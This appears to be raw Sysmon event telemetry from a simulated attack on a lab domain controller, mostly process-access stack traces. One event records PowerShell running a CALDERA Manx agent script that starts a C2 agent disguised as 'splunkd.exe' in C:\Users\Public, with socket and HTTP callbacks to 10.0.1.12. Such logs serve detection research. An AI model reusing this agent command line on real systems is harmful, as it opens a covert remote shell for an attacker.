10:40:03.354{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF6-5F80-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001143Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.354{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF6-5F80-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001142Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.307{733EE690-3DF7-5F80-0A00-000000007F01}852936C:\Windows\system32\services.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001141Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.307{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001140Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.307{733EE690-3DF7-5F80-0A00-000000007F01}8521112C:\Windows\system32\services.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001139Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.311{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k smbsvcsC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001138Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.307{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001137Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.307{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001136Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.307{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001135Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.307{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001134Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:02.104{733EE690-3DF9-5F80-1200-000000007F01}12081332C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|c:\windows\system32\es.dll+118e5|c:\windows\system32\es.dll+13b72|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be 10341000x80000000000000001133Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:02.104{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001132Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:01.120{733EE690-3E01-5F80-2600-000000007F01}30602156C:\Windows\system32\conhost.exe{733EE690-3E01-5F80-2500-000000007F01}3052C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001131Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:01.104{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E01-5F80-2600-000000007F01}3060C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001130Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:01.104{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E01-5F80-2500-000000007F01}3052C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001129Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:01.104{733EE690-3DF9-5F80-1800-000000007F01}21042808Shell.Commands.ManagWindowsPowerShell\v1.0\powershell.exe{733EE690-3E01-5F80-2500-000000007F01}3052C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+13752f|C:\Windows\System32\windows.storage.dll+1371a5|C:\Windows\System32\windows.storage.dll+136c96|C:\Windows\System32\windows.storage.dll+138108|C:\Windows\System32\windows.storage.dll+136abe|C:\Windows\System32\windows.storage.dll+10a3b5|C:\Windows\System32\windows.storage.dll+10a734|C:\Windows\System32\windows.storage.dll+109d70|C:\Windows\System32\shell32.dll+e8b0f|C:\Windows\System32\shell32.dll+e899c|C:\Windows\System32\shell32.dll+e86ec|C:\Windows\System32\shell32.dll+31537|C:\Windows\System32\shell32.dll+31495|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+33903a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+276811|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+acd828|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+271e5f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b56bc|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\68e2ec0464aa44f07e8a86705ee0d5c8\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\68e2ec0464aa44f07e8a86705ee0d5c8\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64) 154100x80000000000000001128Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:01.055{733EE690-3E01-5F80-2500-000000007F01}3052C:\Users\Public\splunkd.exe-----"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{733EE690-3DF9-5F80-1800-000000007F01}2104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_manx_agent.ps1 11241100x80000000000000001127Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.localEXE2020-10-09 10:40:00.932{733EE690-3DF9-5F80-1800-000000007F01}2104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\splunkd.exe2020-10-09 10:39:01.653 10341000x80000000000000001126Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001125Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001124Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DFF-5F80-2300-000000007F01}2972C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001123Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DFF-5F80-2400-000000007F01}3012C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001122Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DFA-5F80-2000-000000007F01}2376C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001121Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF9-5F80-1700-000000007F01}1828C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001120Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF9-5F80-1600-000000007F01}1572C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001119Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001118Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:00.901{733EE690-3DF9-5F80-1800-000000007F01}21042808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DF9-5F80-1300-000000007F01}1252C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FF9184F3F41) 10341000x80000000000000001117Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 